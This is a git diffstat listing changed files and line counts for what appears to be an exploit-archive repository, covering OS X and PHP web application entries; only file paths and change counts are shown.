platforms/osx/dos/3151.rb | 60 +- platforms/osx/dos/3160.html | 66 +- platforms/osx/dos/3167.c | 86 +- platforms/osx/dos/3200.rb | 48 +- platforms/osx/dos/3230.rb | 210 +- platforms/osx/dos/3257.php | 104 +- platforms/osx/dos/4624.c | 90 +- platforms/osx/dos/4690.c | 192 +- platforms/osx/dos/5151.pl | 126 +- platforms/osx/dos/6043.rb | 154 +- platforms/osx/dos/7088.txt | 348 +- platforms/osx/dos/799.c | 6 +- platforms/osx/dos/8262.c | 224 +- platforms/osx/dos/8263.c | 126 +- platforms/osx/dos/8264.c | 132 +- platforms/osx/local/1043.c | 6 +- platforms/osx/local/15.c | 6 +- platforms/osx/local/1545.pl | 96 +- platforms/osx/local/1962.pl | 254 +- platforms/osx/local/1973.pl | 188 +- platforms/osx/local/2106.pl | 296 +- platforms/osx/local/2107.pl | 310 +- platforms/osx/local/2108.sh | 28 +- platforms/osx/local/2111.pl | 156 +- platforms/osx/local/2463.c | 144 +- platforms/osx/local/2565.pl | 118 +- platforms/osx/local/2580.pl | 156 +- platforms/osx/local/2737.pl | 132 +- platforms/osx/local/2738.pl | 114 +- platforms/osx/local/3070.pl | 86 +- platforms/osx/local/3087.rb | 246 +- platforms/osx/local/3088.rb | 136 +- platforms/osx/local/3102.rb | 152 +- platforms/osx/local/3156.rb | 96 +- platforms/osx/local/3173.rb | 58 +- platforms/osx/local/3219.rb | 88 +- platforms/osx/local/3386.pl | 104 +- platforms/osx/local/3460.php | 328 +- platforms/osx/local/3517.php | 332 +- platforms/osx/local/367.txt | 6 +- platforms/osx/local/4759.c | 432 +- platforms/osx/local/8108.c | 152 +- platforms/osx/local/8266.txt | 710 +- platforms/osx/local/8896.c | 558 +- platforms/osx/local/896.c | 6 +- platforms/osx/remote/1265.pl | 294 +- platforms/osx/remote/1519.pm | 789 +- platforms/osx/remote/1739.pl | 188 +- platforms/osx/remote/3077.rb | 234 +- platforms/osx/remote/391.pl | 6 +- platforms/osx/remote/6013.pl | 242 +- platforms/osx/remote/8861.rb | 278 +- platforms/osx/remote/9247.py | 276 +- platforms/osx/remote/96.c | 6 +- platforms/osx_ppc/shellcode/13478.c | 90 +- platforms/osx_ppc/shellcode/13479.c | 126 +- platforms/osx_ppc/shellcode/13480.c | 4 +- platforms/osx_ppc/shellcode/13481.c | 4 +- platforms/osx_ppc/shellcode/13482.c | 4 +- platforms/osx_ppc/shellcode/13483.c | 4 +- platforms/osx_ppc/shellcode/13484.c | 4 +- platforms/osx_ppc/shellcode/13485.c | 4 +- platforms/osx_ppc/shellcode/13486.c | 4 +- platforms/osx_ppc/shellcode/13487.c | 4 +- platforms/perl/webapps/39564.txt | 46 + platforms/php/webapps/1003.c | 6 +- platforms/php/webapps/1006.pl | 6 +- platforms/php/webapps/1013.pl | 6 +- platforms/php/webapps/1014.txt | 6 +- platforms/php/webapps/1016.pl | 6 +- platforms/php/webapps/1017.php | 6 +- platforms/php/webapps/1018.php | 6 +- platforms/php/webapps/1020.c | 6 +- platforms/php/webapps/1022.pl | 6 +- platforms/php/webapps/1023.pl | 6 +- platforms/php/webapps/1030.pl | 6 +- platforms/php/webapps/1031.pl | 6 +- platforms/php/webapps/1033.pl | 6 +- platforms/php/webapps/1036.php | 6 +- platforms/php/webapps/10379.txt | 2 +- platforms/php/webapps/10388.txt | 2 +- platforms/php/webapps/1049.php | 6 +- platforms/php/webapps/1050.pl | 6 +- platforms/php/webapps/1051.pl | 6 +- platforms/php/webapps/1052.php | 6 +- platforms/php/webapps/1053.pl | 6 +- platforms/php/webapps/1057.pl | 6 +- platforms/php/webapps/10570.txt | 1 - platforms/php/webapps/1058.pl | 6 +- platforms/php/webapps/1059.pl | 6 +- platforms/php/webapps/1060.pl | 6 +- platforms/php/webapps/1061.pl | 6 +- platforms/php/webapps/10640.txt | 1 - platforms/php/webapps/10656.txt | 1 - platforms/php/webapps/10671.txt | 1 - platforms/php/webapps/1068.pl | 6 +- platforms/php/webapps/1069.php | 6 +- platforms/php/webapps/1076.py | 6 +- platforms/php/webapps/1077.pl | 6 +- platforms/php/webapps/1078.pl | 6 +- platforms/php/webapps/1080.pl | 6 +- platforms/php/webapps/1082.pl | 6 +- platforms/php/webapps/1083.pl | 6 +- platforms/php/webapps/1084.pl | 6 +- platforms/php/webapps/10844.txt | 1 - platforms/php/webapps/10847.txt | 1 - platforms/php/webapps/1088.pl | 6 +- platforms/php/webapps/10889.txt | 1 - platforms/php/webapps/1095.txt | 6 +- platforms/php/webapps/1097.txt | 6 +- platforms/php/webapps/10971.txt | 1 - platforms/php/webapps/10979.txt | 1 - platforms/php/webapps/1103.txt | 30 +- platforms/php/webapps/1111.pl | 6 +- platforms/php/webapps/1113.pm | 6 +- platforms/php/webapps/1133.pm | 6 +- platforms/php/webapps/1134.pl | 6 +- platforms/php/webapps/1135.c | 6 +- platforms/php/webapps/11449.txt | 1 - platforms/php/webapps/1145.pm | 6 +- platforms/php/webapps/11484.txt | 1 - platforms/php/webapps/11543.txt | 1 - platforms/php/webapps/1172.pl | 6 +- platforms/php/webapps/1189.c | 6 +- platforms/php/webapps/1191.pl | 6 +- platforms/php/webapps/1200.php | 6 +- platforms/php/webapps/12007.txt | 1 - platforms/php/webapps/1202.php | 6 +- platforms/php/webapps/12028.txt | 1 - platforms/php/webapps/12054.txt | 1 - platforms/php/webapps/12055.txt | 1 - platforms/php/webapps/12056.txt | 1 - platforms/php/webapps/1207.php | 6 +- platforms/php/webapps/1208.pl | 6 +- platforms/php/webapps/12082.txt | 1 - platforms/php/webapps/12083.txt | 1 - platforms/php/webapps/12084.txt | 1 - platforms/php/webapps/12085.txt | 1 - platforms/php/webapps/12087.txt | 1 - platforms/php/webapps/12088.txt | 1 - platforms/php/webapps/12089.txt | 1 - platforms/php/webapps/12101.txt | 1 - platforms/php/webapps/1211.pl | 6 +- platforms/php/webapps/12115.txt | 1 - platforms/php/webapps/12118.txt | 1 - platforms/php/webapps/1214.php | 6 +- platforms/php/webapps/12142.txt | 1 - platforms/php/webapps/12143.txt | 1 - platforms/php/webapps/12144.txt | 1 - platforms/php/webapps/12145.txt | 1 - platforms/php/webapps/12146.txt | 1 - platforms/php/webapps/12147.txt | 1 - platforms/php/webapps/12148.txt | 1 - platforms/php/webapps/12149.txt | 1 - platforms/php/webapps/12150.txt | 1 - platforms/php/webapps/12151.txt | 1 - platforms/php/webapps/1217.pl | 96 +- platforms/php/webapps/1219.c | 266 +- platforms/php/webapps/1221.php | 382 +- platforms/php/webapps/12230.txt | 1 - platforms/php/webapps/12231.txt | 1 - platforms/php/webapps/12232.txt | 1 - platforms/php/webapps/12233.txt | 1 - platforms/php/webapps/12234.txt | 1 - platforms/php/webapps/12235.txt | 1 - platforms/php/webapps/12236.txt | 1 - platforms/php/webapps/12237.txt | 1 - platforms/php/webapps/12238.txt | 1 - platforms/php/webapps/12239.txt | 1 - platforms/php/webapps/1225.php | 324 +- platforms/php/webapps/1226.php | 348 +- platforms/php/webapps/1227.php | 394 +- platforms/php/webapps/12296.txt | 1 - platforms/php/webapps/12318.txt | 1 - platforms/php/webapps/12364.txt | 1 - platforms/php/webapps/12365.txt | 1 - platforms/php/webapps/12366.txt | 1 - platforms/php/webapps/1237.php | 396 +- platforms/php/webapps/1240.php | 328 +- platforms/php/webapps/1241.php | 396 +- platforms/php/webapps/12426.txt | 1 - platforms/php/webapps/12428.txt | 1 - platforms/php/webapps/1244.pl | 106 +- platforms/php/webapps/1245.php | 584 +- platforms/php/webapps/12481.txt | 1 - platforms/php/webapps/1250.php | 952 +- platforms/php/webapps/12579.txt | 1 - platforms/php/webapps/12594.txt | 1 - platforms/php/webapps/1270.php | 512 +- platforms/php/webapps/1273.pl | 130 +- platforms/php/webapps/1278.pl | 786 +- platforms/php/webapps/12790.txt | 1 - platforms/php/webapps/1280.pl | 94 +- platforms/php/webapps/12811.txt | 1 - platforms/php/webapps/12856.txt | 2 +- platforms/php/webapps/12867.txt | 1 - platforms/php/webapps/1289.php | 288 +- platforms/php/webapps/1296.txt | 26 +- platforms/php/webapps/1298.php | 438 +- platforms/php/webapps/1312.php | 468 +- platforms/php/webapps/1315.php | 564 +- platforms/php/webapps/1317.py | 130 +- platforms/php/webapps/1320.txt | 68 +- platforms/php/webapps/1321.pl | 86 +- platforms/php/webapps/1322.pl | 90 +- platforms/php/webapps/1324.php | 764 +- platforms/php/webapps/1325.pl | 56 +- platforms/php/webapps/1326.pl | 118 +- platforms/php/webapps/1329.php | 576 +- platforms/php/webapps/1337.php | 448 +- platforms/php/webapps/1340.php | 834 +- platforms/php/webapps/1342.php | 458 +- platforms/php/webapps/1354.php | 584 +- platforms/php/webapps/1356.php | 696 +- platforms/php/webapps/1358.php | 440 +- platforms/php/webapps/1359.php | 444 +- platforms/php/webapps/1361.c | 298 +- platforms/php/webapps/1363.php | 660 +- platforms/php/webapps/1364.c | 290 +- platforms/php/webapps/1370.php | 542 +- platforms/php/webapps/1373.php | 420 +- platforms/php/webapps/1379.php | 586 +- platforms/php/webapps/1382.pl | 262 +- platforms/php/webapps/1383.txt | 66 +- platforms/php/webapps/1385.pl | 132 +- platforms/php/webapps/1388.pl | 206 +- platforms/php/webapps/13925.txt | 2 +- platforms/php/webapps/1395.php | 428 +- platforms/php/webapps/1398.pl | 252 +- platforms/php/webapps/1400.pl | 326 +- platforms/php/webapps/1401.pl | 222 +- platforms/php/webapps/1405.pl | 174 +- platforms/php/webapps/1410.pl | 210 +- platforms/php/webapps/14415.html | 2 +- platforms/php/webapps/1442.pl | 170 +- platforms/php/webapps/1446.pl | 248 +- platforms/php/webapps/1453.pl | 114 +- platforms/php/webapps/1457.txt | 46 +- platforms/php/webapps/1459.pl | 188 +- platforms/php/webapps/1461.pl | 130 +- platforms/php/webapps/1467.php | 422 +- platforms/php/webapps/1468.php | 408 +- platforms/php/webapps/1469.pl | 94 +- platforms/php/webapps/1478.php | 1754 +-- platforms/php/webapps/1482.php | 404 +- platforms/php/webapps/1485.php | 768 +- platforms/php/webapps/1491.php | 402 +- platforms/php/webapps/1492.php | 120 +- platforms/php/webapps/1493.php | 530 +- platforms/php/webapps/1494.php | 584 +- platforms/php/webapps/1498.php | 144 +- platforms/php/webapps/1499.pl | 132 +- platforms/php/webapps/1501.php | 410 +- platforms/php/webapps/1503.pl | 180 +- platforms/php/webapps/1509.pl | 266 +- platforms/php/webapps/1510.pl | 146 +- platforms/php/webapps/1511.php | 838 +- platforms/php/webapps/1512.pl | 148 +- platforms/php/webapps/1513.php | 138 +- platforms/php/webapps/1516.php | 144 +- platforms/php/webapps/1521.php | 452 +- platforms/php/webapps/1522.php | 980 +- platforms/php/webapps/1523.cpp | 538 +- platforms/php/webapps/1524.htm | 180 +- platforms/php/webapps/1525.pl | 80 +- platforms/php/webapps/1526.php | 164 +- platforms/php/webapps/1527.pl | 110 +- platforms/php/webapps/1530.pl | 88 +- platforms/php/webapps/1532.pl | 92 +- platforms/php/webapps/1533.php | 828 +- platforms/php/webapps/1538.pl | 120 +- platforms/php/webapps/1539.txt | 112 +- platforms/php/webapps/1541.pl | 88 +- platforms/php/webapps/1542.pl | 106 +- platforms/php/webapps/1543.pl | 140 +- platforms/php/webapps/1544.pl | 144 +- platforms/php/webapps/1546.pl | 182 +- platforms/php/webapps/1547.txt | 100 +- platforms/php/webapps/1548.pl | 112 +- platforms/php/webapps/1549.php | 502 +- platforms/php/webapps/1553.pl | 168 +- platforms/php/webapps/1556.pl | 136 +- platforms/php/webapps/1561.pl | 166 +- platforms/php/webapps/1563.pm | 338 +- platforms/php/webapps/1566.php | 408 +- platforms/php/webapps/1567.php | 158 +- platforms/php/webapps/1570.pl | 86 +- platforms/php/webapps/1575.pl | 362 +- platforms/php/webapps/1576.txt | 70 +- platforms/php/webapps/1581.pl | 252 +- platforms/php/webapps/1585.php | 356 +- platforms/php/webapps/1586.php | 294 +- platforms/php/webapps/1587.pl | 176 +- platforms/php/webapps/1588.php | 704 +- platforms/php/webapps/1590.pl | 118 +- platforms/php/webapps/1594.py | 102 +- platforms/php/webapps/1595.php | 724 +- platforms/php/webapps/1600.php | 166 +- platforms/php/webapps/1605.php | 360 +- platforms/php/webapps/1608.php | 376 +- platforms/php/webapps/1609.pl | 232 +- platforms/php/webapps/1610.txt | 20 +- platforms/php/webapps/1611.pl | 214 +- platforms/php/webapps/1612.php | 376 +- platforms/php/webapps/1616.pl | 232 +- platforms/php/webapps/1617.php | 346 +- platforms/php/webapps/1618.c | 198 +- platforms/php/webapps/1619.pl | 92 +- platforms/php/webapps/1621.php | 330 +- platforms/php/webapps/1627.php | 348 +- platforms/php/webapps/1629.pl | 176 +- platforms/php/webapps/1630.pl | 178 +- platforms/php/webapps/1631.php | 280 +- platforms/php/webapps/1632.pl | 184 +- platforms/php/webapps/1640.pl | 174 +- platforms/php/webapps/1644.pl | 182 +- platforms/php/webapps/1645.pl | 1078 +- platforms/php/webapps/1646.php | 398 +- platforms/php/webapps/1647.php | 414 +- platforms/php/webapps/1650.pl | 260 +- platforms/php/webapps/1652.php | 358 +- platforms/php/webapps/1653.txt | 158 +- platforms/php/webapps/1654.txt | 56 +- platforms/php/webapps/1655.php | 166 +- platforms/php/webapps/1656.txt | 78 +- platforms/php/webapps/1659.php | 454 +- platforms/php/webapps/1660.pm | 254 +- platforms/php/webapps/1661.pl | 226 +- platforms/php/webapps/1663.php | 366 +- platforms/php/webapps/1665.pl | 118 +- platforms/php/webapps/1666.php | 578 +- platforms/php/webapps/1668.php | 124 +- platforms/php/webapps/1672.pl | 74 +- platforms/php/webapps/1673.php | 442 +- platforms/php/webapps/1674.txt | 100 +- platforms/php/webapps/1678.php | 444 +- platforms/php/webapps/1682.php | 182 +- platforms/php/webapps/1683.php | 172 +- platforms/php/webapps/1686.pl | 104 +- platforms/php/webapps/1687.txt | 20 +- platforms/php/webapps/1694.pl | 166 +- platforms/php/webapps/1695.pl | 104 +- platforms/php/webapps/1697.php | 532 +- platforms/php/webapps/1701.php | 414 +- platforms/php/webapps/1704.pl | 124 +- platforms/php/webapps/1705.pl | 120 +- platforms/php/webapps/1706.txt | 66 +- platforms/php/webapps/1707.pl | 138 +- platforms/php/webapps/1711.txt | 22 +- platforms/php/webapps/1713.pl | 114 +- platforms/php/webapps/1720.pl | 388 +- platforms/php/webapps/1722.txt | 16 +- platforms/php/webapps/1723.txt | 14 +- platforms/php/webapps/1724.pl | 126 +- platforms/php/webapps/1725.pl | 116 +- platforms/php/webapps/1726.pl | 712 +- platforms/php/webapps/1727.txt | 16 +- platforms/php/webapps/1728.txt | 16 +- platforms/php/webapps/1729.txt | 16 +- platforms/php/webapps/1730.txt | 14 +- platforms/php/webapps/1731.txt | 38 +- platforms/php/webapps/1732.pl | 188 +- platforms/php/webapps/1733.pl | 374 +- platforms/php/webapps/1738.php | 566 +- platforms/php/webapps/1740.pl | 152 +- platforms/php/webapps/1744.pl | 152 +- platforms/php/webapps/1747.pl | 152 +- platforms/php/webapps/1751.php | 102 +- platforms/php/webapps/1753.txt | 38 +- platforms/php/webapps/1756.pl | 248 +- platforms/php/webapps/1760.php | 1220 +- platforms/php/webapps/1761.pl | 166 +- platforms/php/webapps/1764.txt | 18 +- platforms/php/webapps/1765.pl | 150 +- platforms/php/webapps/1766.pl | 178 +- platforms/php/webapps/1767.txt | 38 +- platforms/php/webapps/1768.php | 122 +- platforms/php/webapps/1769.txt | 42 +- platforms/php/webapps/1773.txt | 112 +- platforms/php/webapps/1774.txt | 44 +- platforms/php/webapps/1777.php | 764 +- platforms/php/webapps/1778.txt | 98 +- platforms/php/webapps/1779.txt | 48 +- platforms/php/webapps/1780.php | 1832 +-- platforms/php/webapps/1785.php | 452 +- platforms/php/webapps/1789.txt | 56 +- platforms/php/webapps/1790.txt | 18 +- platforms/php/webapps/1793.pl | 158 +- platforms/php/webapps/1795.txt | 30 +- platforms/php/webapps/1796.php | 304 +- platforms/php/webapps/1797.php | 634 +- platforms/php/webapps/1798.txt | 22 +- platforms/php/webapps/1800.txt | 64 +- platforms/php/webapps/1804.txt | 18 +- platforms/php/webapps/1805.pl | 206 +- platforms/php/webapps/1808.txt | 30 +- platforms/php/webapps/1809.txt | 62 +- platforms/php/webapps/1810.pl | 150 +- platforms/php/webapps/1811.php | 448 +- platforms/php/webapps/1814.txt | 28 +- platforms/php/webapps/1816.php | 384 +- platforms/php/webapps/1817.txt | 88 +- platforms/php/webapps/1818.txt | 86 +- platforms/php/webapps/1821.php | 786 +- platforms/php/webapps/1823.txt | 64 +- platforms/php/webapps/1824.txt | 64 +- platforms/php/webapps/1825.txt | 66 +- platforms/php/webapps/1826.txt | 36 +- platforms/php/webapps/1827.txt | 38 +- platforms/php/webapps/1828.txt | 36 +- platforms/php/webapps/1829.txt | 366 +- platforms/php/webapps/1832.txt | 30 +- platforms/php/webapps/1835.txt | 48 +- platforms/php/webapps/1839.txt | 24 +- platforms/php/webapps/1841.txt | 56 +- platforms/php/webapps/1842.htm | 122 +- platforms/php/webapps/1843.txt | 44 +- platforms/php/webapps/1844.txt | 30 +- platforms/php/webapps/1846.txt | 20 +- platforms/php/webapps/1847.txt | 24 +- platforms/php/webapps/1848.txt | 56 +- platforms/php/webapps/1851.txt | 14 +- platforms/php/webapps/1853.php | 274 +- platforms/php/webapps/1854.txt | 42 +- platforms/php/webapps/1855.txt | 190 +- platforms/php/webapps/1857.pl | 216 +- platforms/php/webapps/1858.txt | 42 +- platforms/php/webapps/1860.txt | 26 +- platforms/php/webapps/1861.txt | 40 +- platforms/php/webapps/1863.txt | 44 +- platforms/php/webapps/1864.txt | 46 +- platforms/php/webapps/1865.txt | 34 +- platforms/php/webapps/1866.txt | 58 +- platforms/php/webapps/1868.php | 768 +- platforms/php/webapps/1869.php | 378 +- platforms/php/webapps/1870.txt | 78 +- platforms/php/webapps/1871.txt | 92 +- platforms/php/webapps/1874.php | 292 +- platforms/php/webapps/1875.htm | 542 +- platforms/php/webapps/1876.pl | 108 +- platforms/php/webapps/1877.php | 300 +- platforms/php/webapps/1879.txt | 52 +- platforms/php/webapps/1881.txt | 40 +- platforms/php/webapps/1882.pl | 98 +- platforms/php/webapps/1883.txt | 56 +- platforms/php/webapps/1886.txt | 54 +- platforms/php/webapps/1887.txt | 60 +- platforms/php/webapps/1888.txt | 38 +- platforms/php/webapps/1890.txt | 20 +- platforms/php/webapps/1891.txt | 60 +- platforms/php/webapps/1892.pl | 154 +- platforms/php/webapps/1895.txt | 56 +- platforms/php/webapps/1896.txt | 56 +- platforms/php/webapps/1897.txt | 62 +- platforms/php/webapps/1898.txt | 108 +- platforms/php/webapps/1899.txt | 56 +- platforms/php/webapps/1901.pl | 216 +- platforms/php/webapps/1902.txt | 64 +- platforms/php/webapps/1903.txt | 96 +- platforms/php/webapps/1904.php | 414 +- platforms/php/webapps/1905.txt | 64 +- platforms/php/webapps/1907.txt | 56 +- platforms/php/webapps/1908.txt | 58 +- platforms/php/webapps/1909.pl | 412 +- platforms/php/webapps/1912.txt | 102 +- platforms/php/webapps/1913.txt | 60 +- platforms/php/webapps/1914.txt | 106 +- platforms/php/webapps/1916.txt | 36 +- platforms/php/webapps/1918.php | 918 +- platforms/php/webapps/1919.txt | 174 +- platforms/php/webapps/1920.php | 530 +- platforms/php/webapps/1921.pl | 176 +- platforms/php/webapps/1923.txt | 30 +- platforms/php/webapps/1925.txt | 236 +- platforms/php/webapps/1926.txt | 82 +- platforms/php/webapps/1928.txt | 98 +- platforms/php/webapps/1929.txt | 38 +- platforms/php/webapps/1932.php | 694 +- platforms/php/webapps/1933.txt | 140 +- platforms/php/webapps/1934.txt | 12 +- platforms/php/webapps/1936.txt | 46 +- platforms/php/webapps/1938.pl | 294 +- platforms/php/webapps/1939.php | 198 +- platforms/php/webapps/1941.php | 468 +- platforms/php/webapps/1942.txt | 44 +- platforms/php/webapps/1943.txt | 138 +- platforms/php/webapps/1945.pl | 178 +- platforms/php/webapps/1946.php | 354 +- platforms/php/webapps/1948.txt | 34 +- platforms/php/webapps/1950.pl | 136 +- platforms/php/webapps/1951.txt | 126 +- platforms/php/webapps/1952.txt | 112 +- platforms/php/webapps/1953.pl | 152 +- platforms/php/webapps/1954.pl | 162 +- platforms/php/webapps/1955.txt | 110 +- platforms/php/webapps/1956.txt | 134 +- platforms/php/webapps/1957.pl | 154 +- platforms/php/webapps/1959.txt | 100 +- platforms/php/webapps/1960.php | 352 +- platforms/php/webapps/1961.txt | 44 +- platforms/php/webapps/1963.txt | 150 +- platforms/php/webapps/1969.txt | 112 +- platforms/php/webapps/1970.txt | 114 +- platforms/php/webapps/1971.txt | 32 +- platforms/php/webapps/1974.txt | 88 +- platforms/php/webapps/1975.pl | 96 +- platforms/php/webapps/1981.txt | 28 +- platforms/php/webapps/1982.txt | 112 +- platforms/php/webapps/1983.txt | 130 +- platforms/php/webapps/1991.php | 562 +- platforms/php/webapps/1993.php | 354 +- platforms/php/webapps/1994.txt | 30 +- platforms/php/webapps/1995.txt | 42 +- platforms/php/webapps/1996.txt | 44 +- platforms/php/webapps/1998.pl | 252 +- platforms/php/webapps/2002.pl | 234 +- platforms/php/webapps/2003.txt | 40 +- platforms/php/webapps/2007.php | 588 +- platforms/php/webapps/2008.php | 422 +- platforms/php/webapps/2009.txt | 44 +- platforms/php/webapps/2019.txt | 52 +- platforms/php/webapps/2020.txt | 36 +- platforms/php/webapps/2021.txt | 68 +- platforms/php/webapps/2022.txt | 60 +- platforms/php/webapps/2024.txt | 42 +- platforms/php/webapps/2025.txt | 78 +- platforms/php/webapps/2026.txt | 38 +- platforms/php/webapps/2027.txt | 38 +- platforms/php/webapps/2028.txt | 38 +- platforms/php/webapps/2029.txt | 52 +- platforms/php/webapps/2030.txt | 184 +- platforms/php/webapps/2032.pl | 502 +- platforms/php/webapps/2036.txt | 88 +- platforms/php/webapps/2046.txt | 270 +- platforms/php/webapps/2049.txt | 30 +- platforms/php/webapps/2050.php | 296 +- platforms/php/webapps/2058.txt | 56 +- platforms/php/webapps/2060.txt | 90 +- platforms/php/webapps/2062.txt | 66 +- platforms/php/webapps/2063.txt | 102 +- platforms/php/webapps/2064.txt | 32 +- platforms/php/webapps/2066.txt | 88 +- platforms/php/webapps/2068.php | 438 +- platforms/php/webapps/2069.txt | 18 +- platforms/php/webapps/2071.php | 528 +- platforms/php/webapps/2072.php | 688 +- platforms/php/webapps/2077.txt | 60 +- platforms/php/webapps/2078.txt | 42 +- platforms/php/webapps/2081.txt | 40 +- platforms/php/webapps/2083.txt | 50 +- platforms/php/webapps/2084.txt | 56 +- platforms/php/webapps/2085.txt | 46 +- platforms/php/webapps/2086.txt | 30 +- platforms/php/webapps/2088.php | 520 +- platforms/php/webapps/2089.txt | 72 +- platforms/php/webapps/2090.txt | 92 +- platforms/php/webapps/2092.txt | 56 +- platforms/php/webapps/2095.txt | 48 +- platforms/php/webapps/2096.txt | 110 +- platforms/php/webapps/2097.txt | 78 +- platforms/php/webapps/2098.txt | 94 +- platforms/php/webapps/2099.txt | 62 +- platforms/php/webapps/2100.txt | 96 +- platforms/php/webapps/2101.txt | 62 +- platforms/php/webapps/2102.txt | 76 +- platforms/php/webapps/2103.txt | 74 +- platforms/php/webapps/2104.txt | 96 +- platforms/php/webapps/2105.php | 842 +- platforms/php/webapps/2109.txt | 78 +- platforms/php/webapps/2110.pm | 322 +- platforms/php/webapps/2113.txt | 48 +- platforms/php/webapps/2114.htm | 38 +- platforms/php/webapps/2115.txt | 38 +- platforms/php/webapps/2116.txt | 50 +- platforms/php/webapps/2117.php | 616 +- platforms/php/webapps/2118.php | 524 +- platforms/php/webapps/2119.txt | 212 +- platforms/php/webapps/2120.txt | 190 +- platforms/php/webapps/2121.txt | 76 +- platforms/php/webapps/2122.txt | 108 +- platforms/php/webapps/2123.txt | 42 +- platforms/php/webapps/2125.txt | 42 +- platforms/php/webapps/2127.txt | 102 +- platforms/php/webapps/2128.txt | 60 +- platforms/php/webapps/2129.txt | 68 +- platforms/php/webapps/2130.txt | 60 +- platforms/php/webapps/2131.txt | 54 +- platforms/php/webapps/2132.txt | 100 +- platforms/php/webapps/2133.txt | 66 +- platforms/php/webapps/2134.txt | 144 +- platforms/php/webapps/2137.txt | 82 +- platforms/php/webapps/2139.txt | 34 +- platforms/php/webapps/2141.txt | 38 +- platforms/php/webapps/2142.txt | 42 +- platforms/php/webapps/2143.pl | 138 +- platforms/php/webapps/2146.txt | 42 +- platforms/php/webapps/2148.txt | 48 +- platforms/php/webapps/2149.txt | 48 +- platforms/php/webapps/2151.txt | 106 +- platforms/php/webapps/2152.php | 236 +- platforms/php/webapps/2153.txt | 28 +- platforms/php/webapps/2154.txt | 80 +- platforms/php/webapps/2155.txt | 36 +- platforms/php/webapps/2157.txt | 46 +- platforms/php/webapps/2158.txt | 82 +- platforms/php/webapps/2159.pl | 318 +- platforms/php/webapps/2161.pl | 250 +- platforms/php/webapps/2163.txt | 76 +- platforms/php/webapps/2165.txt | 44 +- platforms/php/webapps/2166.txt | 36 +- platforms/php/webapps/2167.txt | 58 +- platforms/php/webapps/2168.txt | 34 +- platforms/php/webapps/2169.txt | 64 +- platforms/php/webapps/2170.txt | 220 +- platforms/php/webapps/2171.txt | 100 +- platforms/php/webapps/2172.txt | 182 +- platforms/php/webapps/2173.txt | 40 +- platforms/php/webapps/2174.txt | 82 +- platforms/php/webapps/2175.txt | 174 +- platforms/php/webapps/2177.txt | 84 +- platforms/php/webapps/2178.php | 566 +- platforms/php/webapps/2181.pl | 90 +- platforms/php/webapps/2182.txt | 82 +- platforms/php/webapps/2183.txt | 40 +- platforms/php/webapps/2184.txt | 144 +- platforms/php/webapps/2187.htm | 134 +- platforms/php/webapps/2188.txt | 54 +- platforms/php/webapps/2189.txt | 18 +- platforms/php/webapps/2190.txt | 80 +- platforms/php/webapps/2191.txt | 80 +- platforms/php/webapps/2192.txt | 86 +- platforms/php/webapps/2196.txt | 68 +- platforms/php/webapps/2198.php | 484 +- platforms/php/webapps/2199.txt | 144 +- platforms/php/webapps/2200.txt | 20 +- platforms/php/webapps/2201.txt | 88 +- platforms/php/webapps/2202.txt | 78 +- platforms/php/webapps/2203.txt | 76 +- platforms/php/webapps/2205.txt | 80 +- platforms/php/webapps/2206.txt | 106 +- platforms/php/webapps/2207.txt | 108 +- platforms/php/webapps/2209.txt | 176 +- platforms/php/webapps/2211.txt | 180 +- platforms/php/webapps/2212.txt | 144 +- platforms/php/webapps/2213.txt | 156 +- platforms/php/webapps/2214.txt | 154 +- platforms/php/webapps/2215.txt | 176 +- platforms/php/webapps/2216.txt | 116 +- platforms/php/webapps/2217.txt | 90 +- platforms/php/webapps/2218.txt | 260 +- platforms/php/webapps/2220.txt | 86 +- platforms/php/webapps/2221.txt | 94 +- platforms/php/webapps/2222.txt | 80 +- platforms/php/webapps/2224.txt | 78 +- platforms/php/webapps/2225.txt | 94 +- platforms/php/webapps/2226.txt | 118 +- platforms/php/webapps/2227.txt | 88 +- platforms/php/webapps/2229.txt | 104 +- platforms/php/webapps/2231.php | 352 +- platforms/php/webapps/2232.pl | 132 +- platforms/php/webapps/2235.txt | 32 +- platforms/php/webapps/2236.txt | 110 +- platforms/php/webapps/2239.txt | 52 +- platforms/php/webapps/2240.txt | 104 +- platforms/php/webapps/2243.php | 560 +- platforms/php/webapps/2247.php | 370 +- platforms/php/webapps/2248.pl | 162 +- platforms/php/webapps/2249.txt | 64 +- platforms/php/webapps/2250.pl | 300 +- platforms/php/webapps/2251.pl | 300 +- platforms/php/webapps/2253.php | 480 +- platforms/php/webapps/2254.txt | 60 +- platforms/php/webapps/2255.txt | 32 +- platforms/php/webapps/2256.txt | 50 +- platforms/php/webapps/2257.txt | 132 +- platforms/php/webapps/2259.txt | 90 +- platforms/php/webapps/2260.pl | 238 +- platforms/php/webapps/2261.php | 450 +- platforms/php/webapps/2262.php | 602 +- platforms/php/webapps/2263.txt | 76 +- platforms/php/webapps/2269.txt | 76 +- platforms/php/webapps/2270.php | 474 +- platforms/php/webapps/2271.txt | 62 +- platforms/php/webapps/2272.txt | 34 +- platforms/php/webapps/2273.txt | 74 +- platforms/php/webapps/2275.txt | 56 +- platforms/php/webapps/2279.txt | 84 +- platforms/php/webapps/2280.pl | 250 +- platforms/php/webapps/2281.pl | 4 +- platforms/php/webapps/2282.txt | 48 +- platforms/php/webapps/2285.txt | 120 +- platforms/php/webapps/2288.php | 372 +- platforms/php/webapps/2289.pl | 136 +- platforms/php/webapps/2290.txt | 68 +- platforms/php/webapps/2291.php | 302 +- platforms/php/webapps/2292.txt | 70 +- platforms/php/webapps/2293.txt | 94 +- platforms/php/webapps/2295.txt | 78 +- platforms/php/webapps/2297.pl | 188 +- platforms/php/webapps/2298.php | 450 +- platforms/php/webapps/2299.php | 450 +- platforms/php/webapps/2300.pl | 240 +- platforms/php/webapps/2301.txt | 76 +- platforms/php/webapps/2304.txt | 62 +- platforms/php/webapps/2305.txt | 72 +- platforms/php/webapps/2307.txt | 70 +- platforms/php/webapps/2308.txt | 70 +- platforms/php/webapps/2309.txt | 92 +- platforms/php/webapps/2310.php | 448 +- platforms/php/webapps/2311.txt | 108 +- platforms/php/webapps/2312.txt | 76 +- platforms/php/webapps/2313.txt | 70 +- platforms/php/webapps/2314.txt | 28 +- platforms/php/webapps/2315.txt | 38 +- platforms/php/webapps/2316.txt | 178 +- platforms/php/webapps/2317.txt | 104 +- platforms/php/webapps/2319.txt | 38 +- platforms/php/webapps/2321.php | 334 +- platforms/php/webapps/2322.php | 262 +- platforms/php/webapps/2323.txt | 30 +- platforms/php/webapps/2324.txt | 38 +- platforms/php/webapps/2325.txt | 42 +- platforms/php/webapps/2326.txt | 46 +- platforms/php/webapps/2327.txt | 80 +- 